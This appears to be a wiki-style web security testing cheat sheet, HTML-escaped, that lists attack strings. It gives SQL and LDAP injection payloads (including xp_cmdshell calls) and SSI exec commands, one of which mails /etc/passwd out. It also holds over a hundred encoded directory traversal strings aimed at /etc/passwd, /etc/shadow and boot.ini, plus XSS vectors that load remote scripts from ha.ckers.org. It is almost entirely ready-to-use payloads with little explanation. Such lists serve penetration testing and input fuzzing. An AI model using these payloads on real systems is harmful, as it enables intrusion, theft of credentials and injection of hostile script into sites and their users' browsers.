limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
